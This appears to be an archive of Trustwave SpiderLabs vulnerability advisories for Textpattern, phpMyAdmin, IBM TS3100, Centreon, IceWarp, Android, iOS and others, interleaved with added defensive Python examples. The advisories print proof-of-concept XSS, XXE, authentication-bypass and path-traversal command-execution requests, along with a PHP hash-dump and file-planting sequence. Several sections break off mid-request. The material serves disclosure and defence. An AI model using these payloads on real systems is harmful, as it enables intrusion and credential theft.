User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) 
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: 

TWSL2012-001: Cross-Site Scripting Vulnerability in Textpattern Content Management System

2012-01-04 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2012-001:
Cross-Site Scripting Vulnerability in Textpattern Content Management System

Published: 1/03/12
Version: 1.0

Vendor: Textpattern (http://textpattern.com/)
Product: Textpattern
Version affected: 4.4.1 before change set 3612

Product description:
Textpattern is an open source content management system originally
developed by Dean Allen. While it is often listed among weblogging tools,
its aim is to be a general-purpose content management system suitable for
deployment in many contexts. Textpattern is written in PHP using a MySQL
database backend.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Cross-Site Scripting Vulnerability
CVE: CVE-2011-5019

After extracting the Textpattern source files onto a web server, but
before the application is fully installed, cross-site scripting
vulnerabilities are present in the '/textpattern/setup/index.php' page.

Example(s):

Performing XSS on ddb parameter

#Request

POST /textpattern/setup/index.php HTTP/1.1

Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/textpattern/setup/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=printConfig

#Response

HTTP/1.1 200 OK
Date: Sat, 10 Dec 2011 02:46:44 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2
Content-Length: 674
Connection: close
Content-Type: text/html; charset=utf-8

snip--

<div align="center"><p>Checking database
connection</p><p>Connected</p><p>Database
<strong><script>alert('123')</script></strong> does not exist or your
specified user does not have permission to access it.</p>

Remediation Steps:
Textpattern change set 3612 includes a fix for this security issue. Upgrade
to the latest version.


Revision History:
12/23/11 - Vulnerability disclosed
12/23/11 - Patch released by vendor
1/03/12 - Advisory published







TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin

2011-12-23 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2011-019:
Cross-Site Scripting Vulnerability in phpMyAdmin

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-019.txt

Published: 12/22/11
Version: 1.0

Vendor: phpMyAdmin (http://www.phpmyadmin.net/)
Product: phpMyAdmin
Version affected: 3.4.8 and prior

Product description:
An open source tool developed in PHP to manage and administer MySQL
databases remotely.  The web browser interface allows creating, modifying
or deleting databases, tables, fields or rows, executing SQL statements,
and other database functions.

Credit: Jason Leyrer of Trustwave SpiderLabs

Finding 1: Cross-Site Scripting (XSS) Vulnerability in Setup Interface
CVE: CVE-2011-4782

Affected versions of phpMyAdmin do not sanitize user-supplied server names
before displaying them in its Setup Overview. This allows remote attackers
to execute arbitrary web scripts or HTML via a crafted request.

phpMyAdmin allows users to add database servers via its Setup interface.
Since phpMyAdmin doesn't do any input validation on server hostnames when
they are entered, it is up to whatever displays these names throughout the
application to use htmlspecialchars() (or similar) to sanitize them.

phpMyAdmin uses a function called perform_config_checks() to perform a
series of compatibility, security and consistency checks on application
configuration options. If it finds settings that are contrary to best
practices, perform_config_checks() generates messages to be displayed to
users at the top of the Setup Overview page. The messages generated for
some of these configuration options ($cfg['Servers'][$i]['ssl'],
$cfg['Servers'][$i]['extension'], $cfg['Servers'][$i]['auth_type'],
$cfg['Servers'][$i]['AllowRoot'], and
$cfg['Servers'][$i]['AllowNoPassword']) are constructed using user-supplied
hostnames without any sanitization taking place. This can lead to web
script being executed when the Setup Overview page is loaded.
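The message construction the advisory describes, as an added example in Python rather than phpMyAdmin's own PHP: the same five checks, once with the hostname interpolated raw and once escaped the way htmlspecialchars() would. The server records and the wording of each check are constructed for this example.

```python
import html

# The five settings the advisory lists as producing messages that embed the
# server hostname. Check conditions and wording are constructed, not
# phpMyAdmin's own.
CHECKED_KEYS = ("ssl", "extension", "auth_type", "AllowRoot", "AllowNoPassword")

# Constructed server entries; the second carries the advisory's XSS payload
# as its hostname.
SERVERS = [
    {"host": "db1.example.internal", "ssl": False, "extension": "mysqli",
     "auth_type": "cookie", "AllowRoot": True, "AllowNoPassword": False},
    {"host": "<script>alert('XSS');</script>", "ssl": False, "extension": "mysql",
     "auth_type": "config", "AllowRoot": True, "AllowNoPassword": True},
]


def config_warnings(server, sanitize):
    """Return (setting, message) pairs for one server.

    sanitize=False embeds the hostname verbatim, the behaviour the advisory
    describes; sanitize=True HTML-escapes it first (the htmlspecialchars()
    equivalent), so the message is inert when rendered.
    """
    host = html.escape(server["host"], quote=True) if sanitize else server["host"]
    found = []
    if not server.get("ssl"):
        found.append(("ssl", "Server %s does not use SSL for its connection" % host))
    if server.get("extension") == "mysql":
        found.append(("extension", "Server %s uses the legacy mysql extension" % host))
    if server.get("auth_type") == "config":
        found.append(("auth_type", "Server %s stores credentials in the configuration file" % host))
    if server.get("AllowRoot"):
        found.append(("AllowRoot", "Server %s allows root login" % host))
    if server.get("AllowNoPassword"):
        found.append(("AllowNoPassword", "Server %s allows login without a password" % host))
    return found


def render_overview(servers, sanitize=True):
    """Build the HTML list shown at the top of the Setup Overview page."""
    items = ["<li>%s</li>" % msg
             for server in servers
             for _, msg in config_warnings(server, sanitize)]
    return "<ul>" + "".join(items) + "</ul>"


def contains_live_script(page):
    """True if the rendered page carries an unescaped <script> element."""
    return "<script>" in page.lower()
```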

The following is a Proof of Concept (PoC):

1. Request the Setup interface's index page in order to obtain the
phpMyAdmin cookie and the value of 'token', which appears in the response
body:

Request
---
GET /phpmyadmin/setup/index.php HTTP/1.1

Response

HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 16:42:17 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.2
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly
Expires: Thu, 01 Dec 2011 16:42:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 01 Dec 2011 16:42:17 GMT
Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly
X-Frame-Options: SAMEORIGIN
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7722
Content-Type: text/html; charset=utf-8

---snip---

<input type="hidden" name="token" value="5acce3a965bbe9d42ce50bdf3d491ed9" />


2. Input javascript (%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E) to
the 'Servers-0-host' input field in Add New Server mode, as shown in the
postdata of the following request:


Request
---
POST /phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server
Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 1430


TWSL2011-018: Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface

2011-12-21 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2011-018:
Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-018.txt

Published: 2011-12-20
Version: 1.0

Vendor: IBM (http://www.ibm.com)
Product: TS3100/TS3200 Tape Library
Version affected: Firmware less than A.60

Product description:
Entry-level tape library designed to provide reliable, high-capacity,
high-performance tape backup. The TS3100/TS3200 models and their storage
management applications are designed to address capacity, performance, data
protection, reliability, availability, affordability and application
requirements. It is designed as a functionally rich, entry-level tape-storage
solution incorporating LTO Ultrium tape technology.


Credit: Martin Murfitt of Trustwave SpiderLabs

Finding: Authentication Bypass (Web Management Console)
CVE: CVE-2011-1372

The IBM TS3100/TS3200 Web User Interface is vulnerable to an authentication
bypass attack. By sending a series of requests to the authentication
function, it is possible to trigger a condition which causes the
application to grant an access cookie that permits remote administration.

Repeated queries using the following HTTP query arguments provided
administrative access to the appliance after several tries:

user_level=3&password=aaa&login=Log+in'

The password is not believed to be significant. Once access is granted,
the following cookies are set on the client's browser:

Cookie: RMU_LEVEL=3; RMU_LOGIN=


Remediation Steps:
Update firmware version to A.60 or above.

Revision History:
1/17/11 - Vulnerability disclosed
11/18/11 - Patch released by vendor
12/20/11 - Advisory published


References
1. http://www-03.ibm.com/systems/storage/tape/ts3200/


About Trustwave:
Trustwave is the leading provider of on-demand and
subscription-based information security and payment card
industry compliance management solutions to businesses and
government entities throughout the world. For organizations
faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with
comprehensive solutions that include its flagship
TrustKeeper compliance management software and other
proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500
businesses and large financial institutions to small and
medium-sized retailers--manage compliance and secure their
network infrastructure, data communications and critical
information assets. Trustwave is headquartered in Chicago
with offices throughout North America, South America,
Europe, Africa, China and Australia. For more information,
visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs is the advanced security team at Trustwave
responsible for incident response and forensics, ethical
hacking and application security tests for Trustwave's
clients. SpiderLabs has responded to hundreds of security
incidents, performed thousands of ethical hacking exercises
and tested the security of hundreds of business applications
for Fortune 500 organizations. For more information visit
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided as
is without warranty of any kind. Trustwave disclaims all
warranties, either express or implied, including the
warranties of merchantability and fitness for a particular
purpose. In no event shall Trustwave or its suppliers be
liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business
profits or special damages, even if Trustwave or its
suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or
limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.




TWSL2011-017: Multiple Vulnerabilities in Merethis Centreon

2011-11-08 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2011-017:
Multiple Vulnerabilities in Merethis Centreon

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-017.txt

Published: 2011-11-04
Version: 1.0

Vendor: Merethis (http://www.merethis.com and http://www.centreon.com)
Product: Centreon
Version affected: 2.3.1 and prior

Product description:
Centreon is a network supervision and monitoring tool based upon the
Nagios open source monitoring engine. Centreon can be used as a Nagios
GUI and provides features such as real-time system monitoring,
performance management and system management.

Credit: Christophe De La Fuente of Trustwave SpiderLabs

Finding 1: Remote Command Execution

The Centreon supervision and monitoring tool provided by Merethis permits
remote code execution from the command help web page, allowing an
attacker to execute arbitrary commands in the context of the web server
hosting the application. Any account that has been granted access to
Configuration > Nagios > Checks is able to execute commands.

The following Proof of Concept (PoC) executes the command
'cat /etc/passwd':

http://example.domain/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1
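An added example, not Centreon's code, of the confinement check the command help page needed: the command_name value is decoded once, restricted to a safe character set and resolved under an assumed plugin directory, which rejects the PoC value above. The plugin directory and the legitimate plugin name are assumptions.

```python
import os
import re
from urllib.parse import unquote

# Assumed plugin directory; the advisory does not state Centreon's real path.
PLUGIN_DIR = "/usr/lib/nagios/plugins"

# Letters, digits, dot, underscore, dash and slash only: no space, '#', ';',
# '|' or anything else a shell would interpret.
NAME_RE = re.compile(r"[A-Za-z0-9_./-]+")


def resolve_command(raw_name):
    """Map a command_name parameter to a plugin path, or return None.

    The value is URL-decoded once (as the web server would do), may carry a
    leading slash, and must resolve to a location inside PLUGIN_DIR.
    """
    name = unquote(raw_name).lstrip("/")
    if not name or not NAME_RE.fullmatch(name):
        return None
    base = os.path.normpath(PLUGIN_DIR)
    target = os.path.normpath(os.path.join(base, name))
    # normpath collapses the ".." segments; if the result has left the plugin
    # directory, the traversal in the PoC above is exactly what happened.
    if os.path.commonpath([base, target]) != base:
        return None
    return target


# The PoC value from the advisory, a traversal without the shell characters,
# and a constructed legitimate plugin name.
POC_NAME = "/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23"
TRAVERSAL_ONLY = "/Centreon/SNMP/../../../../bin/cat"
LEGIT_NAME = "/Centreon/SNMP/check_snmp_load.pl"
```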

Finding 2: One-Way Hash Without a Salt

The following code at lines 329-349 from
www/include/configuration/nconfigObject/contact/DB-Func.php
shows the insertContactInDB() function inserting the MD5 or SHA1
password hash in the database without using a salt:

$rq = "INSERT INTO `contact` ( " .
    "`contact_id` , `timeperiod_tp_id` , `timeperiod_tp_id2` , `contact_name` , " .
    "`contact_alias` , `contact_autologin_key` , `contact_passwd` , `contact_lang` , `contact_template_id`, " .
    "`contact_host_notification_options` , `contact_service_notification_options` , " .
    "`contact_email` , `contact_pager` , `contact_comment` , `contact_oreon`, " .
    "`contact_register`, `contact_enable_notifications` , " .
    "`contact_admin` , `contact_type_msg`, `contact_activate`, `contact_auth_type`, " .
    "`contact_ldap_dn`, `contact_location`, `contact_address1`, `contact_address2`, " .
    "`contact_address3`, `contact_address4`, `contact_address5`, `contact_address6`) " .
    "VALUES ( ";
$rq .= "NULL, ";
isset($ret["timeperiod_tp_id"]) && $ret["timeperiod_tp_id"] != NULL ? $rq .= "'".$ret["timeperiod_tp_id"]."', " : $rq .= "NULL, ";
isset($ret["timeperiod_tp_id2"]) && $ret["timeperiod_tp_id2"] != NULL ? $rq .= "'".$ret["timeperiod_tp_id2"]."', " : $rq .= "NULL, ";
isset($ret["contact_name"]) && $ret["contact_name"] != NULL ? $rq .= "'".htmlentities($ret["contact_name"], ENT_QUOTES, "UTF-8")."', " : $rq .= "NULL, ";
isset($ret["contact_alias"]) && $ret["contact_alias"] != NULL ? $rq .= "'".htmlentities($ret["contact_alias"], ENT_QUOTES, "UTF-8")."', " : $rq .= "NULL, ";
isset($ret["contact_autologin_key"]) && $ret["contact_autologin_key"] != NULL ? $rq .= "'".htmlentities($ret["contact_autologin_key"], ENT_QUOTES)."', " : $rq .= "NULL, ";
// The password column receives a bare md5() or sha1() of the password: no salt.
if ($encryptType == 1)
    isset($ret["contact_passwd"]) && $ret["contact_passwd"] != NULL ? $rq .= "'".md5($ret["contact_passwd"])."', " : $rq .= "NULL, ";
else if ($encryptType == 2)
    isset($ret["contact_passwd"]) && $ret["contact_passwd"] != NULL ? $rq .= "'".sha1($ret["contact_passwd"])."', " : $rq .= "NULL, ";
else
    isset($ret["contact_passwd"]) && $ret["contact_passwd"] != NULL ? $rq .= "'".md5($ret["contact_passwd"])."', " : $rq .= "NULL, ";


The combination of unsalted hashes and Finding 1 allows an attacker to
recover passwords for all accounts. The following example illustrates
this attack.
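An added example (not Centreon's code) of what Finding 2 costs once a contact_passwd column has been dumped, beside a salted PBKDF2 alternative; the accounts and the wordlist are constructed.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000


def store_unsalted(password):
    """What insertContactInDB() does for $encryptType == 1: a bare md5()."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def store_salted(password, salt=None):
    """Per-user random salt plus PBKDF2-HMAC-SHA256, encoded as one field."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_salted(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _, iters, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(candidate.hex(), digest_hex)


def lookup_table_recovery(stored_hashes, wordlist):
    """Why an unsalted column falls quickly: one md5 per wordlist entry is
    enough, and every account sharing a password is recovered at once.
    Returns {user: recovered_password}. The same table is useless against
    the salted column, where equal passwords hash differently."""
    table = {store_unsalted(word): word for word in wordlist}
    return {user: table[h] for user, h in stored_hashes.items() if h in table}


# Constructed accounts; two users share a weak password.
CONTACTS = {"alice": "password", "bob": "password", "carol": "Q7#vr!2zLm"}
UNSALTED_COLUMN = {user: store_unsalted(pw) for user, pw in CONTACTS.items()}
SALTED_COLUMN = {user: store_salted(pw) for user, pw in CONTACTS.items()}
```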

The following php code will dump the hashes of all users:

<?php
require_once ("/etc/centreon/centreon.conf.php");
require_once "$classdir/centreonDB.class.php";
$p = new CentreonDB();
$r = $p->query("SELECT contact_passwd from centreon.contact");
while ($w = $r->fetchRow()) { echo $w["contact_passwd"] . "<br>"; }
?>

To upload and execute this code on the server, one method is to convert
the above php code to hexadecimal and use the remote code execution
method outlined in Finding 1 to create a server-side php file. The
length of the URL accepted in this case is limited, so the file must
be broken into three parts. The following requests create the php
file test.php:

http://example.domain/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../usr/bin/printf%20\\x3c\\x3f\\x70\\x68\\x70\\x20\\x72\\x65\\x71\\x75\\x69\\x72\\x65\\x5f\\x6f\\x6e\\x63\\x65\\x20\\x28\\x22\\x2f\\x65\\x74\\x63\\x2f\\x63\\x65\\x6e\\x74\\x72\\x65\\x6f\\x6e\\x2f\\x63\\x65\\x6e\\x74\\x72\\x65\\x6f\\x6e\\x2e\\x63\\x6f\\x6e\\x66\\x2e\\x70\\x68\\x70\\x22\\x29\\x3b\\x20\\x72\\x65\\x71\\x75\\x69\\x72\\x65\\x5f\\x6f\\x6e\\x63\\x65\\x20\\x22\\x24\\x63\\x6c\\x61\\x73\\x73\\x64\\x69\\x72\\x2f\\x63\\x65\\x6e\\x74%20|tee%20-a%20test.php%20%23&o=h&min=1


TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation

2011-09-26 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2011-014:
Vulnerability in Pantech Web Browser SSL Implementation

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-014.txt

Published: 2011-09-23
Version: 1.0

Vendor: Pantech (http://www.pantechusa.com)
Product: Link P7040P, others may be vulnerable
Version affected: JLUS040201 confirmed, others may be vulnerable

Product description:
The Pantech Link is a mobile phone supporting a 2.4 LCD screen and full
keyboard that facilitates simple text messaging.

Credit: Paul Kehrer of Trustwave SpiderLabs

Finding: Vulnerability in Pantech Web Browser SSL Implementation

Pantech Link/P7040P browser SSL certificate parsing contains a flaw where
it fails to check the Basic Constraints parameter of certificates in the
chain.

By signing a new certificate using a legitimate end entity certificate,
an attacker can obtain a valid certificate for any domain. For example:

-TrustedCA
--somedomain.com (legitimate certificate)
---api.someotherdomain.com (signed by somedomain.com)

Using this technique any SSL traffic using the api.someotherdomain.com
certificate can be intercepted transparently to the end user if the
attacker is in control of the network.

Revision History:
08/12/11 - Vulnerability Disclosed
09/23/11 - Advisory Published

Remediation Steps:
This vulnerability has not been addressed at the time of this advisory.
Mobile users should be aware of this issue and proceed with caution when
transmitting SSL traffic.





TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server

2011-09-26 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2011-013:
Multiple Vulnerabilities in IceWarp Mail Server

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt

Published: 2011-09-23
Version: 1.0

Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 10.3.2 and below

Product description: IceWarp WebMail is the web front-end for the IceWarp
Mail Server, which provides email access on over 50,000 servers. IceWarp
WebMail provides web-based access to email, calendars, contacts, files
and shared data from any computer with a browser and Internet connection.

Credit: David Kirkpatrick of Trustwave's SpiderLabs

Finding 1: XML External Entity Injection
CVE: CVE-2011-3579

An external entity is a function of the XML specification which allows XML
documents to reference resources external to the XML document. This
functionality forces the XML parser of the application to access the
resource specified.

In this case it is possible to inject an XML DOCTYPE SYSTEM directive to
access local files on the operating system where the IceWarp server is
installed. Using this technique it is possible to retrieve readable files
on the operating system. This attack can also be used to create a possible
denial of service condition.

Proof-of-Concept:

The following POST request was sent to the host A.B.C.D where the IceWarp
mail server was running:

REQUEST
=
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D
Content-Length: 249
Content-Type: application/xml;charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache

<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini">]>
<iq type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffcd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method></query></iq>

RESPONSE:
==
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul 2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
Vary: Accept-Encoding
Content-Length: 1113

<?xml version="1.0" encoding="utf-8"?><iq type="error"><error uid="login_invalid">test; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
TRUNCATED

The above proof-of-concept would retrieve the c:\windows\win.ini file (the
response in this example has been truncated).
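An added example, not IceWarp's code, of parsing the webmail:iq:auth body with the standard-library expat parser configured to refuse DOCTYPE and entity declarations, so a SYSTEM entity like the one in the PoC is never resolved. The sample bodies are constructed after the PoC, with a shortened digest.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a request body carries a DOCTYPE or entity declaration."""


def parse_auth_request(body):
    """Parse an <iq type="set"><query xmlns="webmail:iq:auth"> body and
    return its username, digest and method as a dict.

    Any DOCTYPE or entity declaration aborts parsing before expat can act on
    it, so an external entity never reaches the filesystem.
    """
    fields = {}
    path = []

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden("DOCTYPE %r is not allowed in a request body" % name)

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DTDForbidden("entity %r is not allowed in a request body" % name)

    def start(name, attrs):
        if name == "iq" and attrs.get("type") != "set":
            raise ValueError("expected an iq of type 'set'")
        if name == "query" and attrs.get("xmlns") != "webmail:iq:auth":
            raise ValueError("unexpected query namespace")
        path.append(name)

    def end(name):
        path.pop()

    def chars(data):
        # Character data may arrive in several chunks; accumulate it.
        if path and path[-1] in ("username", "digest", "method"):
            fields[path[-1]] = fields.get(path[-1], "") + data

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(body, True)
    return fields


def rejects_body(body):
    """True if parse_auth_request refuses the body because of a DTD."""
    try:
        parse_auth_request(body)
    except DTDForbidden:
        return True
    return False


# Constructed after the advisory's PoC; the digest is shortened.
LOGIN_REQUEST = (
    '<iq type="set"><query xmlns="webmail:iq:auth">'
    "<username>test</username><digest>828cd27c6fb73ee3</digest>"
    "<method>RSA</method></query></iq>"
)
XXE_REQUEST = (
    '<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini">]>'
    + LOGIN_REQUEST.replace("<username>test</username>",
                            "<username>test&xxeb91c4;</username>")
)
```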


Finding 2: PHP Information Disclosure
CVE: CVE-2011-3580

It is possible to retrieve the PHP information file phpinfo() by accessing
the following URL http://A.B.C.D/server where A.B.C.D is the IP of the
server running the IceWarp software. The response will be a page detailing
the PHP version used and the configuration settings of PHP, including
system details.


Vendor Response: These issues have been addressed as of version 10.3.3

Remediation Steps: Customers should update to the latest version of IceWarp
Mail Server in order to address these issues. The above issues have been
corrected in version 10.3.3.

Revision History:
08/03/11 - Vulnerability disclosed
09/19/11 - Patch released
09/23/11 - Advisory published



TWSL2011-008: Focus Stealing Vulnerability in Android

2011-08-09 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2011-008:
Focus Stealing Vulnerability in Android

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-008.txt

Published: 2011-08-06
Version: 1.0

Vendor: Google (http://www.android.com/)
Product: Android
Versions affected: Tested on 2.1 - 2.3
Other versions may also be affected

Product description:
Android is an open-source software stack for mobile devices which includes
an operating system, key applications, and middleware. The Android mobile
operating system is based on a modified version of the Linux kernel.
Android is currently owned and developed by Google.


Credit: Sean Schulte of Trustwave

Finding 1: Covert Focus Stealing

Android uses Intents and Activities such that the preferred application is
always used for any given content/context. For example, a URL can always
be opened with the Browser, and an image can be opened with the Gallery,
Gmail or Twitter. To make this seamless for the user, switching between
Activities always uses the same animation, whether the Activity belongs to
the same app or a different app.

Additionally, a service running in the background is able to 1) determine
which app is currently running in the foreground, and 2) display an
Activity defined in its own app (i.e., not the current foreground app).

These two features combine to allow a malicious developer to run a
service that looks for apps it knows how to attack and displays a login
screen to the user when those apps run. For example, when the user opens an
app which requires a login, the malicious service displays a screen that
looks identical to the legitimate login screen. Android gives no indication
that the login screen actually belongs to a different app, and the
Activity-switching animation is the same as it would be if the real app
had legitimately displayed its login screen. In the case of a pixel-perfect
malicious login screen, the user has no visual indication that focus has
switched away from the legitimate app. When the user supplies his
credentials, they can be sent to a remote server, allowing the attacker to
steal them without the user's knowledge.

Any app that supplies a login screen is vulnerable to this attack.


Remediation Steps:
This vulnerability has not been fixed at the time of this advisory. As an
alternative solution, users should be cautious when downloading third-party
applications. Because of the nature of the vulnerability, a malicious
application must be installed for a user to be vulnerable.

Revision History:
03/18/11 - Vulnerability Disclosed to Google
07/08/11 - Publication/Disclosure Discussed with Vendor
08/06/11 - Advisory Published



TWSL2011-007: iOS SSL Implementation Does Not Validate Certificate Chain

2011-07-26 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2011-007:
iOS SSL Implementation Does Not Validate Certificate Chain

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-007.txt

Published: 2011-07-25
Version: 1.0

Vendor: Apple (http://www.apple.com)
Product: iOS
Version affected:  Versions Prior to 5.0b4, 4.3.5, and 4.2.10

Product description:
iOS is Apple's mobile operating system for the iPhone, iPod Touch, and iPad
hardware platforms.

Credit: Paul Kehrer of Trustwave

Finding: iOS SSL Implementation Does Not Validate Certificate Chain
CVE: CVE-2011-0228

iOS's SSL certificate parsing contains a flaw where it fails to check the
basicConstraints parameter of certificates in the chain. By signing a new
certificate using a legitimate end entity certificate, an attacker can
obtain a valid certificate for any domain. For example:

-TrustedCA
--somedomain.com (legitimate certificate)
---api.someotherdomain.com (signed by somedomain.com)

Using this technique any SSL traffic using the api.someotherdomain.com
certificate can be intercepted and decrypted by the issuer. No notification
of the invalid nature of the certificate is presented to the iOS user.
This method allows for transparent man-in-the-middle attacks against
encrypted iOS communications.
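For this finding and the identical Pantech one (TWSL2011-014), an added example that is neither Apple's nor Pantech's code: chain verification over a simplified certificate model with the basicConstraints check the affected stacks skipped. It goes slightly beyond the advisories by also enforcing pathLenConstraint, and issuer-name lookup stands in for the signature check a real verifier performs.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Cert:
    """Simplified certificate: names plus the basicConstraints extension."""
    subject: str
    issuer: str
    is_ca: bool                     # basicConstraints cA flag
    path_len: Optional[int] = None  # basicConstraints pathLenConstraint


# The chain from both advisories. TrustedCA is a trust anchor; somedomain.com
# holds a legitimate end-entity certificate; api.someotherdomain.com is the
# rogue certificate signed with somedomain.com's key.
TRUSTED_CA = Cert("TrustedCA", "TrustedCA", is_ca=True)
LEGIT_LEAF = Cert("somedomain.com", "TrustedCA", is_ca=False)
ROGUE_LEAF = Cert("api.someotherdomain.com", "somedomain.com", is_ca=False)

# Constructed certificates for the pathLenConstraint case.
LIMITED_CA = Cert("LimitedCA", "TrustedCA", is_ca=True, path_len=0)
SUB_CA = Cert("SubCA", "LimitedCA", is_ca=True)
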